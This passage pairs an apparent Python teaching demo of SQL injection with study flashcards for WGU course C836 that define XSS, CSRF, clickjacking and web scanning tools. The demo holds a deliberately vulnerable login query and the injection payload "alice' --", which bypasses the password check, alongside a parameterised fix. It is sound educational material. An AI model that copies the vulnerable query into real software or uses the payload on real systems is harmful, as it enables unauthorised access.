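    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [("alice", "s3cret", "admin"), ("bob", "hunter2", "user")])
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    """Query assembled by string formatting: whatever the attacker types becomes SQL.
    Returns the role on success, None otherwise."""
    query = (f"SELECT role FROM users WHERE username = '{username}' "
             f"AND password = '{password}'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn: sqlite3.Connection, username: str, password: str):
    """Parameterised query: the driver passes the values separately from the statement,
    so quotes and comment markers in the input are just characters to compare against."""
    row = conn.execute("SELECT role FROM users WHERE username = ? AND password = ?",
                       (username, password)).fetchone()
    return row[0] if row else None


def valid_username(username: str) -> bool:
    """First line of defence: reject anything outside the allowlist before it goes near a
    query, a shell command or a file path. fullmatch, not match, so a trailing newline
    cannot sneak past the pattern."""
    return USERNAME_RE.fullmatch(username) is not None


def demo() -> tuple:
    conn = setup_db()
    payload = "alice' --"          # closes the quote, comments out the password check
    return (login_vulnerable(conn, payload, "wrong"),   # 'admin': logged in as alice
            login_safe(conn, payload, "wrong"),         # None
            valid_username(payload))                    # False


if __name__ == "__main__":
    print(demo())   # ('admin', None, False)
```

Parameterisation is the fix that closes the hole; validation is defence in depth that also shrinks what an attacker can try elsewhere. Neither replaces the other: an allowlist alone would not protect a field that legitimately contains quotes, such as a surname.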
Cross-Site Scripting (XSS) - ANS An attack carried out by placing code written in a scripting language into a Web page, or other media interpreted by a client browser (including Adobe Flash animations and some types of video files), so that the code runs in the victim's browser with the victim's session.

Cross-Site Request Forgery (XSRF) - ANS The attacker places a link, or links, on a Web page in such a way that they are automatically followed, in order to initiate a particular action on another Web page or application where the user is currently authenticated.

Clickjacking - ANS An attack that takes advantage of the graphical display capabilities of our browser to trick us into clicking on something we otherwise would not. Clickjacking works by placing another layer over the page, or portions of the page, to obscure what we are actually clicking.

Server-side Attacks - ANS Target weaknesses on the web server itself: lack of input validation, improper or inadequate permissions, and extraneous files left on the server.

Web Application Analysis Tools - ANS Perform the same general set of tasks: they search for common flaws such as XSS or SQL injection, as well as improperly set permissions, extraneous files, outdated software versions, and many similar items. Examples: Nikto, Wikto, and Burp Suite.

Fuzzers - ANS Work by bombarding our applications with all manner of data and inputs from a wide variety of sources, in the hope of causing the application to fail or to behave in unexpected ways that reveal a vulnerability.

BinScope Binary Analyzer - ANS A tool developed by Microsoft that examines compiled binaries (not source code) to verify that they were built with recommended protections such as stack cookies, ASLR and DEP compatibility, and safe exception handling.

Nikto/Wikto - ANS Check for many common server-side vulnerabilities and create an index of all the files and directories they can see on the target Web server.

Institution
WGU Course C836
Module
WGU Course C836








